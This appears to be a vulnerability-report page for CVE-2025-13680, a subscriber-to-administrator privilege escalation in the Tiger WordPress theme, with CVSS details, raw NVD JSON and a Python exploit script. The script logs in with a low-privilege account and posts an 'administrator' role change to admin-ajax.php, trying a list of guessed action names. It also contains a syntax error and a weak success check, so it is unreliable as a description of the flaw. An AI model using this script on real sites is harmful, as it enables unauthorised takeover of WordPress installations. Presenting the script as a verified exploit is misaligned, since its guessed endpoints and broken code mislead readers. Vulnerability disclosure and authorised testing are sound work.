Security Vulnerability Report
中文
CVE-2025-13680 CVSS 8.8 HIGH

CVE-2025-13680

Published: 2025-11-27 05:16:15
Last Modified: 2026-04-15 00:35:42

Description

The Tiger theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 101.2.1. This is due to the plugin allowing a user to update the user role through the $user->set_role() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Tiger Theme < 101.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urljoin # CVE-2025-13680 PoC - WordPress Tiger Theme Privilege Escalation # Target: WordPress with Tiger Theme <= 101.2.1 # Author: Security Researcher # Note: This PoC demonstrates the vulnerability for authorized testing only def exploit_privilege_escalation(target_url, username, password): """ Exploit privilege escalation vulnerability in Tiger Theme. Allows low-privileged users (Subscriber+) to escalate to Administrator. Args: target_url: Base URL of the WordPress site username: Low-privilege account username password: Low-privilege account password Returns: bool: True if exploitation successful, False otherwise """ session = requests.Session() # Step 1: Login with low-privilege account login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Logging in as {username}...") response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed. Please check credentials.") return False print("[+] Login successful!") # Step 2: Identify Tiger Theme vulnerability endpoint # The vulnerable endpoint is typically in theme's AJAX handler ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php') # Common vulnerable action names in Tiger theme vulnerable_actions = [ 'tiger_update_user_role', 'tiger_set_user_role', 'update_user_role', 'tiger_profile_update', 'tiger_save_settings' ] print("[*] Attempting privilege escalation...") for action in vulnerable_actions: # Step 3: Send privilege escalation request exploit_data = { 'action': action, 'user_id': 'current', # Target current user 'role': 'administrator' # Escalate to administrator } try: response = session.post(ajax_url, data=exploit_data, timeout=10) # Step 4: Verify privilege escalation check_url = urljoin(target_url, '/wp-admin/profile.php') verify_response = session.get(check_url) if verify_response.status_code == 200: if 'administrator' in verify_response.text.lower() or '/wp-admin/' in verify_response.text: print(f"[+] Privilege escalation successful via action: {action}") print("[+] Current user now has Administrator privileges!") print(f"[+] Access admin panel at: {urljoin(target_url, '/wp-admin/'}") return True except requests.RequestException as e: print(f"[-] Error with action {action}: {e}") continue print("[-] Privilege escalation failed. Target may be patched or not vulnerable.") return False def main(): if len(sys.argv) != 4: print("Usage: python cve-2025-13680.py <target_url> <username> <password>") print("Example: python cve-2025-13680.py http://example.com/ subscriber password123") sys.exit(1) target_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print("=" * 60) print("CVE-2025-13680 - Tiger Theme Privilege Escalation Exploit") print("=" * 60) exploit_privilege_escalation(target_url, username, password) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13680", "sourceIdentifier": "[email protected]", "published": "2025-11-27T05:16:15.253", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tiger theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 101.2.1. This is due to the plugin allowing a user to update the user role through the $user->set_role() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://themeforest.net/item/tiger-social-network-theme-for-companies-professionals/16203995", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/645f60ad-c8e5-47ec-94f1-960de4ef7838?source=cve", "source": "[email protected]"}]}}